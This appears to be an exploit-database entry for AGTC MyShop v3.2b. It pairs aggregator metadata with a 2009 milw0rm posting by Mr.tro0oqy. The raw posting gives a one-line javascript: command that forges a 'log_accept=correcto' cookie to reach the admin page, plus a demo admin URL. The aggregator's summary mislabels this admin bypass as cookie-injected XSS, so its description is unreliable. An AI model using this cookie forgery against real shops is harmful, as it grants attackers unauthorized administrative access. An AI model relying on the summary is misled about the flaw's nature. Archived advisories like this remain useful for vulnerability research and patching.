AGTC MyShop v3.2b

vendor:

MyShop

by:

Mr.tro0oqy

7,5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: MyShop

Affected Version From: 3.2b

Affected Version To: 3.2b

Patch Exists: NO

Related CWE: N/A

CPE: a:agtc:myshop:3.2b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A Cross-Site Scripting (XSS) vulnerability exists in AGTC MyShop v3.2b. An attacker can inject malicious JavaScript code into the 'log_accept' cookie, which is then executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent the injection of malicious JavaScript code.

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : AGTC MyShop v3.2b
[+] Site :www.websiteforsaleuk.co.uk
[+] Found by : Mr.tro0oqy  
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit:
--------
javascript:document.cookie="log_accept=correcto;path=/";

Demo :
------
http://www.websiteforsaleuk.co.uk/demo/admin.php


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima

all my Friends

# milw0rm.com [2009-05-04]